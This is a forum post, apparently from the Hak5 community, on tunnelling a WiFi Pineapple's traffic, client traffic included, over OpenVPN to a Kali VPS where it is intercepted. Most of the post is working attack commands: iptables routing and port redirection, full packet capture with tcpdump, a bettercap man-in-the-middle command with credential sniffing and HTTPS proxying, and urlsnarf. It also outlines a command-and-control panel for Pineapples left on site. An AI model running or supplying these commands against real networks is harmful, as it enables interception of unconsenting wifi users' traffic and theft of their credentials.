Some ideas about a Wifi-Pineapple Server

[BeNe]

I spent some time again with the Nano and my VPN Server since Darren & Snubs talked about VPN in the last Hak5 Sessions. 

The idea behind is nothing new and i´m sure many Pineapple-User out there done it already this way (more or less). I talk about a Server to "power-Up" the Pineapple, something like a "WiFi-Pineapple Server". In simple words - route the complete Pineapple Traffic (that also includes the traffic from the wifi clients), to a powerfull VPN Server and attack/change/record it there.

The Pineapple is mobile and perfect to broadcast SSID´s, deauth clients and catch them - but none pineapple is powerfull enough to play Man-in-the-Middle, save the whole traffic fast enough without any storage limit or generate Certificates fast enought on the fly....

So the plan is simple:

• Install a Kali Linux inside a VPS (or take a Debian template and add the Kali repository)
• Install a VPN Server on it (You can use a simple script for that part --> https://github.com/Nyr/openvpn-install which is explained in the Hak5 Epsiode 2202)
• Copy the OpenVPN Config to the Nano (/root/nano.ovpn in my case)  and install openvpn (for some more info please check also the Hak5 Episode 2202)

opkg update && opkg install openvpn-openssl

• Route all traffic to the VPN Sever
  • (Add the following lines to the /etc/rc.local file:)

openvpn /root/nano.ovpn &
iptables -t nat -A POSTROUTING -s 172.16.42.0/24 -o tun0 -j MASQUERADE
iptables -A FORWARD -s 172.16.42.0/24 -o tun0 -j ACCEPT 
iptables -A FORWARD -d 172.16.42.0/24 -m state --state ESTABLISHED,RELATED -i tun0 -j ACCEPT

Now the complete traffic goes throught the VPN Tunnel to the Sever where we can catch it on tun0 

Some examples:

Record the complete traffic to a pcap and show the out directly on shell:

tcpdump -i tun0 -w - | tee /root/tcpdump/dump-$(date +%F_%R).pcap | tcpdump -r -

Start a MiTM Attack with bettercap:

bettercap -L --no-discovery -O /root/bettercap/bettercap.log -X -P '*' --proxy -P POST --proxy-https --allow-local-connections

I added the "--no-discovery" option since it make no sense on a hosted VPS.
If you want to use the http & https proxy, you need to redirect the ports on the VPS:

iptables -t nat -A PREROUTING -i tun0 -p tcp --dport 443 -j DNAT --to-destination 11.22.33.44:8083
iptables -t nat -A PREROUTING -i tun0 -p tcp --dport 80 -j DNAT --to-destination 11.22.33.44:8080

Change 11.22.33.44 to your external Server IP-Address.

FireUp URLSnarf:

urlsnarf -i tun0

Good to know:
As we use OpenVPN with a tun device the interface comes without a MAC-Adress. So not every piece of software will run.
A workaround is maybe to use a tap device (bridge) instead of a tun (routed). It is more overhead traffic but if it works...
In some cases you could use eth0 from your Server - in some not. Depends on your Hosters config an your tool.

Some more options:

You can create a second or third OpenVPN Config for your Lan-Turtle, Smartphone or Laptop.
If you open the tunnel on your Smartphone or Laptop you will be able to connect via 10.8.0.2 (in my case) to the pineapple via ssh or webinterface.
It is more or less the same as autossh - but just the easy way. So drop you pineapple everywhere and connect simple via VPN.

Some simple ideas (brainstorming) for a Pineapple-Server:
 - Backup your pineapple files to the Server (Logs, Files, Modules,...)
 - Sync Broadcast SSID´s from one Pineapple to the other via VPN during a pentest for a higher result.
 - A Tactical Webinterface to connect directly to a dropped pineapple, get status, see conncted devices (like a C&C Center)
 - Pineapple-Stats v2 (was a cool module for the MarkV)
 - Move modules to the Server instead on the pineapple to use the power of the Server (something like Install to Internal / SD-Card / Server)
 - Use any other pentest tool your want, Metasploit on the Server :)

This works of course with the MarkV, Nano and Tetra.

As i said - is nothing new to use a VPN Connection, combine it with a pineapple and route it to a Server. But this gives complete new options to every Pineapple user.  Yes, you will need a Server and a know how - but the speed and the options of it - is it worth.

Have fun - thanks!